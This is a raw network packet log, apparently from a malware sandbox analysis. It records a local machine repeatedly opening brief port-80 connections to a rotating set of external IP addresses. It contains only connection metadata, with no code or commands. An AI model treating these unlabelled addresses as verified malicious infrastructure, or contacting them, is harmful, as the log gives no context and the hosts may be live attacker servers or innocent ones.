                                                                        Nov 7, 2024 17:58:17.210490942 CET8049846199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:17.884562016 CET8049846199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:17.884584904 CET8049846199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:17.884655952 CET4984680192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:17.916327953 CET8049846199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:17.916390896 CET4984680192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:18.716949940 CET4984680192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:19.736215115 CET4984780192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:19.741449118 CET8049847199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:19.741703033 CET4984780192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:19.752448082 CET4984780192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:19.757745981 CET8049847199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:19.758884907 CET8049847199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:20.377840042 CET8049847199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:20.377867937 CET8049847199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:20.377927065 CET4984780192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:20.378503084 CET8049847199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:20.378557920 CET4984780192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:21.263700962 CET4984780192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:22.282829046 CET4984880192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:22.287798882 CET8049848199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:22.287926912 CET4984880192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:22.296019077 CET4984880192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:22.300951004 CET8049848199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:22.913733006 CET8049848199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:22.913758993 CET8049848199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:22.913954020 CET4984880192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:22.914266109 CET8049848199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:22.914326906 CET4984880192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:22.916692019 CET4984880192.168.2.7199.59.243.227
                                                                        Nov 7, 2024 17:58:22.921590090 CET8049848199.59.243.227192.168.2.7
                                                                        Nov 7, 2024 17:58:27.998872042 CET4985080192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:28.004432917 CET804985066.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:28.004560947 CET4985080192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:28.029933929 CET4985080192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:28.034859896 CET804985066.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:28.689205885 CET804985066.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:28.689233065 CET804985066.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:28.689248085 CET804985066.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:28.689301968 CET4985080192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:28.689490080 CET804985066.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:28.689536095 CET4985080192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:28.689694881 CET804985066.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:28.727593899 CET804985066.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:28.727786064 CET4985080192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:29.544949055 CET4985080192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:30.563802004 CET4985180192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:30.568733931 CET804985166.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:30.568856001 CET4985180192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:30.580878973 CET4985180192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:30.585854053 CET804985166.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:31.242033005 CET804985166.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:31.242069960 CET804985166.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:31.242082119 CET804985166.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:31.242093086 CET804985166.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:31.242105961 CET804985166.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:31.242221117 CET4985180192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:31.242271900 CET4985180192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:31.280797958 CET804985166.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:31.281023026 CET4985180192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:32.091945887 CET4985180192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:33.110558987 CET4985280192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:33.115636110 CET804985266.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:33.115793943 CET4985280192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:33.127088070 CET4985280192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:33.132078886 CET804985266.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:33.132356882 CET804985266.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:33.803602934 CET804985266.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:33.803643942 CET804985266.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:33.803653955 CET804985266.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:33.803664923 CET804985266.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:33.803678036 CET804985266.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:33.803688049 CET804985266.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:33.803731918 CET4985280192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:33.803787947 CET4985280192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:33.842133999 CET804985266.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:33.842314959 CET4985280192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:34.638724089 CET4985280192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:35.659440041 CET4985380192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:35.664392948 CET804985366.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:35.664467096 CET4985380192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:35.675074100 CET4985380192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:35.679980040 CET804985366.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:36.369124889 CET804985366.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:36.369148970 CET804985366.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:36.369180918 CET804985366.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:36.369193077 CET804985366.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:36.369204044 CET804985366.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:36.369214058 CET804985366.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:36.369224072 CET804985366.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:36.369235039 CET804985366.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:36.369246006 CET804985366.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:36.369317055 CET4985380192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:36.369359016 CET4985380192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:36.406928062 CET804985366.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:36.407114029 CET4985380192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:36.408174038 CET4985380192.168.2.766.29.146.14
                                                                        Nov 7, 2024 17:58:36.413069963 CET804985366.29.146.14192.168.2.7
                                                                        Nov 7, 2024 17:58:41.842068911 CET4985480192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:41.847064972 CET8049854209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:41.847146034 CET4985480192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:41.863027096 CET4985480192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:41.868011951 CET8049854209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:42.534456968 CET8049854209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:42.573124886 CET8049854209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:42.573183060 CET4985480192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:43.373087883 CET4985480192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:44.392074108 CET4985580192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:44.397114038 CET8049855209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:44.397213936 CET4985580192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:44.408447981 CET4985580192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:44.413333893 CET8049855209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:45.071439028 CET8049855209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:45.109424114 CET8049855209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:45.112994909 CET4985580192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:45.920134068 CET4985580192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:47.038800955 CET4985680192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:47.043823004 CET8049856209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:47.043940067 CET4985680192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:47.112903118 CET4985680192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:47.117846012 CET8049856209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:47.117856979 CET8049856209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:47.721957922 CET8049856209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:47.760505915 CET8049856209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:47.760646105 CET4985680192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:48.623075008 CET4985680192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:49.643054962 CET4985780192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:49.648216963 CET8049857209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:49.648896933 CET4985780192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:49.657613039 CET4985780192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:49.662568092 CET8049857209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:50.336545944 CET8049857209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:50.374924898 CET8049857209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:50.375030994 CET4985780192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:50.389314890 CET4985780192.168.2.7209.74.64.58
                                                                        Nov 7, 2024 17:58:50.394958973 CET8049857209.74.64.58192.168.2.7
                                                                        Nov 7, 2024 17:58:55.771259069 CET4985880192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:55.776160002 CET804985847.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:58:55.776228905 CET4985880192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:55.792196989 CET4985880192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:55.796984911 CET804985847.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:58:56.732330084 CET804985847.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:58:56.826167107 CET4985880192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:56.910331964 CET804985847.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:58:56.910407066 CET4985880192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:57.296811104 CET4985880192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:58.313663960 CET4985980192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:58.318716049 CET804985947.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:58:58.318870068 CET4985980192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:58.330439091 CET4985980192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:58.335982084 CET804985947.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:58:59.293710947 CET804985947.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:58:59.424825907 CET4985980192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:59.485843897 CET804985947.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:58:59.486402035 CET4985980192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:58:59.841945887 CET4985980192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:00.861840963 CET4986080192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:00.866781950 CET804986047.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:00.866991043 CET4986080192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:00.878912926 CET4986080192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:00.883965015 CET804986047.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:00.883977890 CET804986047.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:01.803971052 CET804986047.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:01.857417107 CET4986080192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:01.980545998 CET804986047.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:01.980602980 CET4986080192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:02.388969898 CET4986080192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:03.408339977 CET4986180192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:03.415206909 CET804986147.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:03.415297031 CET4986180192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:03.424273968 CET4986180192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:03.429121017 CET804986147.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:04.377646923 CET804986147.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:04.435561895 CET4986180192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:04.561451912 CET804986147.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:04.562632084 CET4986180192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:04.563509941 CET4986180192.168.2.747.242.89.146
                                                                        Nov 7, 2024 17:59:04.568286896 CET804986147.242.89.146192.168.2.7
                                                                        Nov 7, 2024 17:59:09.631587982 CET4986280192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:09.636496067 CET8049862128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:09.636586905 CET4986280192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:09.648832083 CET4986280192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:09.654014111 CET8049862128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:11.154355049 CET4986280192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:11.159638882 CET8049862128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:11.159694910 CET4986280192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:12.174693108 CET4986380192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:12.179616928 CET8049863128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:12.180102110 CET4986380192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:12.195035934 CET4986380192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:12.200014114 CET8049863128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:13.703170061 CET4986380192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:13.708642960 CET8049863128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:13.708750010 CET4986380192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:14.720499039 CET4986480192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:14.725780964 CET8049864128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:14.726231098 CET4986480192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:14.736999989 CET4986480192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:14.741852999 CET8049864128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:14.742301941 CET8049864128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:16.248827934 CET4986480192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:16.255186081 CET8049864128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:16.256875992 CET4986480192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:17.339165926 CET4986580192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:17.344926119 CET8049865128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:17.345009089 CET4986580192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:17.387095928 CET4986580192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:17.392179966 CET8049865128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:19.906847000 CET8049865128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:19.951901913 CET4986580192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:20.027719021 CET8049865128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:20.027844906 CET4986580192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:20.028925896 CET4986580192.168.2.7128.65.195.180
                                                                        Nov 7, 2024 17:59:20.033806086 CET8049865128.65.195.180192.168.2.7
                                                                        Nov 7, 2024 17:59:25.102818012 CET4986680192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:25.107850075 CET8049866217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:25.108001947 CET4986680192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:25.119571924 CET4986680192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:25.124577045 CET8049866217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:25.928353071 CET8049866217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:26.035686970 CET8049866217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:26.035744905 CET4986680192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:26.624037027 CET4986680192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:27.644859076 CET4986780192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:27.650145054 CET8049867217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:27.650342941 CET4986780192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:27.664902925 CET4986780192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:27.669934034 CET8049867217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:28.457751036 CET8049867217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:28.529373884 CET4986780192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:28.566087008 CET8049867217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:28.566142082 CET4986780192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:29.170864105 CET4986780192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:30.192914009 CET4986980192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:30.198093891 CET8049869217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:30.198174000 CET4986980192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:30.212539911 CET4986980192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:30.217375040 CET8049869217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:30.217559099 CET8049869217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:31.018398046 CET8049869217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:31.127082109 CET8049869217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:31.130919933 CET4986980192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:31.718823910 CET4986980192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:32.736213923 CET4987080192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:32.741102934 CET8049870217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:32.741178989 CET4987080192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:32.748753071 CET4987080192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:32.753602028 CET8049870217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:33.567106962 CET8049870217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:33.567126036 CET8049870217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:33.567140102 CET8049870217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:33.567148924 CET8049870217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:33.567437887 CET4987080192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:33.675378084 CET8049870217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:33.677046061 CET4987080192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:33.680926085 CET4987080192.168.2.7217.70.184.50
                                                                        Nov 7, 2024 17:59:33.685836077 CET8049870217.70.184.50192.168.2.7
                                                                        Nov 7, 2024 17:59:38.710841894 CET4987180192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:38.718683958 CET80498713.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:38.718792915 CET4987180192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:38.729836941 CET4987180192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:38.736440897 CET80498713.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:39.344089031 CET80498713.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:39.344161034 CET4987180192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:40.232981920 CET4987180192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:40.318098068 CET80498713.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:41.252572060 CET4987280192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:41.257714033 CET80498723.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:41.257816076 CET4987280192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:41.271070004 CET4987280192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:41.276051044 CET80498723.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:41.900665045 CET80498723.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:41.905312061 CET4987280192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:42.781847000 CET4987280192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:42.789081097 CET80498723.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:43.799882889 CET4987380192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:43.805075884 CET80498733.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:43.805162907 CET4987380192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:43.825514078 CET4987380192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:43.830665112 CET80498733.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:43.831280947 CET80498733.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:45.342012882 CET4987380192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:45.347194910 CET80498733.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:45.347248077 CET4987380192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:46.362838984 CET4987480192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:46.369025946 CET80498743.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:46.370970011 CET4987480192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:46.378237963 CET4987480192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:46.383543015 CET80498743.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:48.111644983 CET80498743.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:48.144001007 CET80498743.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:48.146161079 CET4987480192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:48.150831938 CET4987480192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:48.155586958 CET80498743.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:53.198227882 CET4987580192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:53.203794003 CET80498753.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:53.203871012 CET4987580192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:53.217937946 CET4987580192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:53.222846031 CET80498753.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:53.830676079 CET80498753.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:53.830931902 CET4987580192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:54.732723951 CET4987580192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:54.737706900 CET80498753.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:55.751585960 CET4987680192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:55.756588936 CET80498763.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:55.756877899 CET4987680192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:55.768888950 CET4987680192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:55.774312019 CET80498763.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:56.385379076 CET80498763.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:56.386878967 CET4987680192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:57.280755997 CET4987680192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:57.286056042 CET80498763.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:58.355272055 CET4987780192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:58.360306978 CET80498773.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:58.360604048 CET4987780192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:58.375539064 CET4987780192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:58.380536079 CET80498773.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:58.380551100 CET80498773.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:59.084731102 CET80498773.33.130.190192.168.2.7
                                                                        Nov 7, 2024 17:59:59.084798098 CET4987780192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:59.890868902 CET4987780192.168.2.73.33.130.190
                                                                        Nov 7, 2024 17:59:59.895891905 CET80498773.33.130.190192.168.2.7
                                                                        Nov 7, 2024 18:00:00.931386948 CET4987880192.168.2.73.33.130.190
                                                                        Nov 7, 2024 18:00:00.978691101 CET80498783.33.130.190192.168.2.7
                                                                        Nov 7, 2024 18:00:00.978775024 CET4987880192.168.2.73.33.130.190
                                                                        Nov 7, 2024 18:00:01.173201084 CET4987880192.168.2.73.33.130.190
                                                                        Nov 7, 2024 18:00:01.178020000 CET80498783.33.130.190192.168.2.7
                                                                        Nov 7, 2024 18:00:01.690964937 CET80498783.33.130.190192.168.2.7
                                                                        Nov 7, 2024 18:00:01.691658020 CET80498783.33.130.190192.168.2.7
                                                                        Nov 7, 2024 18:00:01.691705942 CET4987880192.168.2.73.33.130.190
                                                                        Nov 7, 2024 18:00:01.766102076 CET4987880192.168.2.73.33.130.190
                                                                        Nov 7, 2024 18:00:01.770998001 CET80498783.33.130.190192.168.2.7
                                                                        Nov 7, 2024 18:00:07.347784996 CET4987980192.168.2.747.52.221.8
                                                                        Nov 7, 2024 18:00:07.352668047 CET804987947.52.221.8192.168.2.7
                                                                        Nov 7, 2024 18:00:07.352906942 CET4987980192.168.2.747.52.221.8
                                                                        Nov 7, 2024 18:00:07.365875006 CET4987980192.168.2.747.52.221.8
                                                                        Nov 7, 2024 18:00:07.371005058 CET804987947.52.221.8192.168.2.7
